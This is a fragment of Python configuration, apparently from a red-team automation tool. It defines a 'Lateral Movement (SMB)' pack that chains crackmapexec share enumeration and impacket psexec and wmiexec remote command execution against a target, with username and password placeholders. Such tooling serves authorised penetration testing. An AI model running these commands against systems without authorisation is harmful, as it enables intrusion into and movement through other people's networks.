                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
        ],
    },
    {
        "id": "pack_builtin_lateral_smb",
        "name": "Lateral Movement (SMB)",
        "description": "Lateral movement via SMB: share enum, exec, pivot setup",
        "tags": ["lateral", "smb", "impacket"],
        "steps": [
            {
                "title": "SMB share enum",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "crackmapexec smb {target} -u '{username}' -p '{password}' --shares 2>&1"
                },
                "on_success": "next",
                "on_failure": "stop",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "Execute command (psexec)",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-psexec '{domain}/{username}:{password}@{target}' 'whoami /all' 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "WMI exec",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-wmiexec '{domain}/{username}:{password}@{target}' 'whoami /all' 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
        ],
    },
]
